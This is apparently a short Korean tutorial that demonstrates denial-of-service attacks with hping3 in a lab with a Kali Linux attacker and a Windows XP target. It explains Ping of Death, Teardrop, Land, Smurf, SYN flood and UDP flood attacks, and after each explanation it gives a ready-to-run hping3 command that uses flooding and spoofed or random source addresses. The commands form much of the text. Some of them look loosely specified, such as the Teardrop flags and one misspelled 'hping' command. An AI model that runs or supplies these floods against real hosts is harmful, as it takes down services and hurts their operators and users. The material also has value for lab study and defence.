hping3를 이용한 DoS 공격

DoS : Denial of Service, 서비스 거부 공격

DDoS : Distributed Denial of Service, 분산 서비스 거부 공격

​

​

Hacker	192.168.10.6 (Kali Linux)
Target	192.168.10.8 (Windows XP)

​

Ping Of Death

: ICMP를 이용해 대용량의 조각화 된 패킷을 전송해 Target에서 재조립을 하지만 모든 자원을 사용하게되어 시스템이 다운(요즘은 안먹힘 ㅋ)

​

ex) hping3 --icmp [Target] -d 10000000 --rand-source

​

​

​

Teardrop

: 패킷을 조각화할 때 Fragment Offset 값을 조작하여 Target이 재조립을 하지 못 하게 해 에러를 발생시킴

​

ex) hping3 [Target] -a [출발지 IP] --id [id] -M [sequence number] --icmp --flood -d [data size]

​

​

​

Land Attack

: 패킷을 전달할 때 출발지 IP주소를 Target의 IP로 조작한 패킷을 전송해 부하를 일으킴

​

ex) hping3 [Target] -a [출발지 IP(Target)] --flood --icmp

​

​

​

Smurf Attack

: 패킷을 전달할 때 출발지 IP를 Target의 IP로 조작한 패킷을 Broadcast로 전송

​

ex) hping3 [Broadcast] -a [출발지 IP(Target)] --flood --icmp

​

​

​

Syn Flooding

: SYN 패킷을 무수히 많이 보내 서버가 SYN_RECEIVED 상태로 ACK 패킷을 계속 기다리느라 모든 자원을 사용

​

ex) hping3 [Target] -p 80 -S --flood

​

​

​

UDP Flooding

: 무수히 많은 UDP 데이터 패킷을 보내 상대방의 대역폭을 모두 잠식

​

ex) hping [Target] -2(udp) --flood --rand-source -d [data size] -p 80